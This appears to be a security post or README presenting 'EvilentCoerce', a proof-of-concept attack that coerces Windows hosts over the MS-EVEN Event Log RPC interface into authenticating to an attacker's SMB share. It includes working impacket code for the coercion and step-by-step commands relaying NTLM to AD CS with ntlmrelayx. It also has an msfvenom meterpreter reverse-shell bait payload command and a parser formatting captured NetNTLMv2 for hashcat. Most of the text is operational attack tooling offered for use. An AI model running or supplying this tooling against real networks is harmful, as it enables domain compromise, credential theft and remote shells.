Evilent PoC Exposes Windows Event Log Vulnerability, Leaking NetNTLMv2 Credentials via SMB Share
Evilent Coerce
A practical NTLM relay attack using the MS-EVEN RPC protocol and antivirus-assisted coercion.
Evilent is a PoC tool that calls the ElfrOpenBELW procedure of the MS-EVEN RPC interface (the Windows Event Log service, reached over the \pipe\eventlog named pipe). ElfrOpenBELW opens a backup event log from a caller-supplied path; when that path is a UNC path, the Event Log service on the target connects to the attacker-controlled SMB share to fetch it. If antivirus software (e.g., Defender) is present, it may scan the fetched file and, in doing so, authenticate to the share itself, leaking a NetNTLMv2 response that can be relayed with ntlmrelayx.
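For readers who want to see the coercion as a single RPC call rather than as a tool invocation, here is the same ElfrOpenBELW call issued directly with impacket. This is an added example, not EvilentCoerce's own code: it assumes impacket is installed and that its MS-EVEN binding (impacket.dcerpc.v5.even) exposes hElfrOpenBELW as in upstream impacket; the listener, share and file names are placeholders.

```python
"""Issue the MS-EVEN coercion directly with impacket.

Added example, not EvilentCoerce's own code. Assumes impacket is installed and
that its MS-EVEN binding (impacket.dcerpc.v5.even) provides hElfrOpenBELW, as
in upstream impacket; listener/share/file names are placeholders.
"""
import sys


def backup_unc(listener_ip: str, share: str, filename: str) -> str:
    """UNC path passed as ElfrOpenBELW's BackupFileName. The target's Event Log
    service opens it as a backup log, which is the outbound SMB connection we want."""
    return "\\\\%s\\%s\\%s" % (listener_ip, share, filename)


def coerce(target: str, domain: str, username: str, password: str, unc_path: str) -> str:
    """Bind to \\pipe\\eventlog on the target over SMB and call ElfrOpenBELW.
    Returns the outcome as text; a DCERPC status error is the normal result,
    because the coercion has already happened by the time the service fails the open."""
    # Imported here so backup_unc() stays usable where impacket is absent.
    from impacket.dcerpc.v5 import even, transport
    from impacket.dcerpc.v5.rpcrt import DCERPCException

    rpc = transport.DCERPCTransportFactory(r"ncacn_np:%s[\pipe\eventlog]" % target)
    rpc.set_credentials(username, password, domain)  # credentials used to bind to MS-EVEN
    dce = rpc.get_dce_rpc()
    dce.connect()
    dce.bind(even.MSRPC_UUID_EVEN)
    try:
        even.hElfrOpenBELW(dce, unc_path)  # assumed helper name, as in upstream impacket
        return "open succeeded"
    except DCERPCException as err:
        return "open failed after connection: %s" % err
    finally:
        dce.disconnect()


if __name__ == "__main__":
    # usage: coerce.py <domain> <user> <password> <target> <listener_ip> <share> <file>
    d, u, p, t, lip, share, fname = sys.argv[1:8]
    print(coerce(t, d, u, p, backup_unc(lip, share, fname)))
```

Run it with the SMB listener already up; the status returned by the call does not matter, what matters is the inbound SMB connection (and, with antivirus present, the follow-up authentication) on the listener side.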
This project includes:
- evilent.py — triggers the MS-EVEN coercion
- fefender.py — helper script to run impacket-smbserver and ntlmrelayx in parallel for harvesting and relaying credentials
This attack is a combination of previously known techniques:
- MS-EVEN coercion (originally PoC’d in C by @evilashz)
- NTLM leak through antivirus file scanning behavior
- Credential relaying via impacket’s ntlmrelayx
Download
git clone https://github.com/Thunter-HackTeam/EvilentCoerce.git
Use
Step 1: Start listener (SMB + relay)
In one terminal:
python3 fefender.py \
  --smbserver-args='Share ./ -smb2support' \
  --ntlmrelayx-args='-smb2support -t http://192.168.140.218/certsrv/certfnsh.asp --adcs --keep-relaying'
This will launch both:
- impacket-smbserver to serve the bait file from the Share directory
- ntlmrelayx to relay the NTLM authentication to a target (here an AD CS web enrollment endpoint, so a relayed machine account yields a certificate for that host)
Step 2: Trigger the attack
In another terminal:
python3 evilent.py -backupfile Sharename\filename domain/username:password@target listener
- target: the victim machine, given as [domain/]username[:password]@<ip>; these credentials are used to bind to the MS-EVEN interface on the target
- listener: IP of the attacker's SMB server, which together with the share path forms the UNC path the target is told to open
- -backupfile: optional Sharename\filename to request; evilent.py generates that file with msfvenom (see Notes), and it must exist on the share
Notes
- The attack works only in Active Directory environments.
- Authentication often comes from NT AUTHORITY\LOCAL SERVICE, which presents an anonymous (null) session on the network and yields nothing to relay; the relayable NetNTLMv2 appears when antivirus on the host scans the fetched file and authenticates as the machine account. Machine-account hashes are not practically crackable, so relaying (e.g., to AD CS) is the useful outcome.
- File-name variants that trigger the scan (e.g., test.exeem䵌䵅P) must be placed on the SMB share ahead of time.
- evilent.py generates the bait executable with msfvenom (msfvenom -p windows/meterpreter/reverse_tcp LHOST={listen_ip} LPORT=4444 -f exe -o {name}); the EXE payload is what gives the antivirus a reason to scan.
- Environment variables such as %USERNAME% may be expanded by the target when they appear in UNC paths (e.g., \\attacker\%USERNAME%), which is a potential information leak in its own right.
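The note on LOCAL SERVICE versus the machine account matters on the listener side: a connection from the Event Log service itself arrives as a null session, while the antivirus scan arrives as the host account. The following added example (not EvilentCoerce's or impacket's code) parses the two NTLMSSP messages a listener sees, classifies the authentication, and formats a genuine NetNTLMv2 response in hashcat 5600 form. The CHALLENGE and AUTHENTICATE messages are constructed in-code from the MS-NLMP layouts, not captured traffic, and the NTProofStr bytes are placeholders rather than a real HMAC; the host, domain and share names are assumptions.

```python
"""Tell a null-session NTLM authentication apart from a machine-account one on
the listener side, and emit the NetNTLMv2 response in hashcat 5600 form.

Added example, not EvilentCoerce's or impacket's code. The CHALLENGE and
AUTHENTICATE messages below are constructed in-code (MS-NLMP layouts), not
captured traffic; the NTProofStr bytes are placeholders, not a real HMAC.
"""
import struct

SIGNATURE = b"NTLMSSP\x00"
NTLMSSP_NEGOTIATE_ANONYMOUS = 0x00000800  # MS-NLMP NegotiateFlags: anonymous connection


def _utf16(s: str) -> bytes:
    return s.encode("utf-16-le")


def _field_desc(data: bytes, offset: int) -> bytes:
    # Len, MaxLen, BufferOffset: the 8-byte field descriptor used by MS-NLMP
    return struct.pack("<HHI", len(data), len(data), offset)


def _read_field(msg: bytes, pos: int) -> bytes:
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, pos)
    return msg[offset:offset + length]


def build_challenge(server_challenge: bytes) -> bytes:
    """Minimal CHALLENGE_MESSAGE (Type 2) with empty TargetName/TargetInfo."""
    header_len = 48
    return (SIGNATURE + struct.pack("<I", 2)
            + _field_desc(b"", header_len)      # TargetNameFields
            + struct.pack("<I", 0xE2898215)      # NegotiateFlags (constructed value)
            + server_challenge                   # 8-byte ServerChallenge at offset 24
            + b"\x00" * 8                        # Reserved
            + _field_desc(b"", header_len))      # TargetInfoFields


def build_authenticate(user, domain, workstation, lm_response, nt_response, flags) -> bytes:
    """AUTHENTICATE_MESSAGE (Type 3) without the optional Version/MIC block."""
    payloads = [lm_response, nt_response, _utf16(domain), _utf16(user), _utf16(workstation), b""]
    descs, body, offset = b"", b"", 64         # 64 = fixed header size
    for payload in payloads:
        descs += _field_desc(payload, offset)
        body += payload
        offset += len(payload)
    return SIGNATURE + struct.pack("<I", 3) + descs + struct.pack("<I", flags) + body


def parse_challenge(msg: bytes) -> bytes:
    """Return the 8-byte ServerChallenge the listener sent."""
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLMSSP CHALLENGE message")
    return msg[24:32]


def parse_authenticate(msg: bytes) -> dict:
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE message")
    return {
        "lm_response": _read_field(msg, 12),
        "nt_response": _read_field(msg, 20),
        "domain": _read_field(msg, 28).decode("utf-16-le"),
        "user": _read_field(msg, 36).decode("utf-16-le"),
        "workstation": _read_field(msg, 44).decode("utf-16-le"),
        "flags": struct.unpack_from("<I", msg, 60)[0],
    }


def classify(auth: dict) -> str:
    """'anonymous' is the null session LOCAL SERVICE presents (nothing to relay);
    'machine' is the host account the antivirus scan authenticates as."""
    if auth["flags"] & NTLMSSP_NEGOTIATE_ANONYMOUS or not auth["user"] or not auth["nt_response"]:
        return "anonymous"
    return "machine" if auth["user"].endswith("$") else "user"


def hashcat_5600(auth: dict, server_challenge: bytes):
    """USER::DOMAIN:ServerChallenge:NTProofStr:blob, or None for NTLMv1/anonymous."""
    nt = auth["nt_response"]
    if len(nt) <= 24:  # NTLMv1 is exactly 24 bytes; v2 is a 16-byte proof plus the blob
        return None
    return "%s::%s:%s:%s:%s" % (auth["user"], auth["domain"],
                                 server_challenge.hex(), nt[:16].hex(), nt[16:].hex())


# Constructed sample exchange (not captured traffic).
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_CHALLENGE = bytes.fromhex("fedcba9876543210")
# NTLMv2 blob: RespType/HiRespType, reserved, timestamp, client challenge, reserved, AV pairs (EOL only), padding
BLOB = b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8 + CLIENT_CHALLENGE + b"\x00" * 4 + b"\x00" * 4 + b"\x00" * 4
NT_PROOF = b"\x11" * 16  # placeholder for HMAC-MD5(NTLMv2 hash, ServerChallenge || blob)
MACHINE_AUTH = build_authenticate("WS01$", "CORP", "WS01", b"\x00" * 24, NT_PROOF + BLOB, 0xE2888215)
NULL_AUTH = build_authenticate("", "", "WS01", b"", b"", 0xE2888215 | NTLMSSP_NEGOTIATE_ANONYMOUS)

if __name__ == "__main__":
    challenge = parse_challenge(build_challenge(SERVER_CHALLENGE))
    for label, msg in (("AV scan", MACHINE_AUTH), ("Event Log service", NULL_AUTH)):
        auth = parse_authenticate(msg)
        print(label, "->", classify(auth), hashcat_5600(auth, challenge))
```

The "machine" classification is the one to act on: the 5600 line is shown for completeness, but for a host account the practical path is the relay, not cracking.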